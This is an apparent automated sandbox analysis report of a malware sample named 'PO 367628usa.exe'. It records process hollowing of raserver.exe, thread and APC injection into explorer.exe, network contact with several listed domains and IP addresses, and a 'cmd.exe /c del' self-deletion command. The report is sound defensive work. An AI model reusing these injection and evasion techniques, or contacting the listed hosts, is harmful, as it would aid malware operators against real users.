          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C83D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO 367628usa.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.bridgestreetresources.com
          Source: C:\Windows\explorer.exeDomain query: www.uuoouu-90.store
          Source: C:\Windows\explorer.exeDomain query: www.patricksparber.com
          Source: C:\Windows\explorer.exeDomain query: www.servantsheartvalet.com
          Source: C:\Windows\explorer.exeDomain query: www.meucamarimoficial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.147 80
          Source: C:\Windows\explorer.exeDomain query: www.m-kenterprises.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.253.106.229 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.182.202.96 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeMemory written: C:\Users\user\Desktop\PO 367628usa.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 367628usa.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 367628usa.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO 367628usa.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 950000
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Users\user\Desktop\PO 367628usa.exeProcess created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'
          Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Users\user\Desktop\PO 367628usa.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
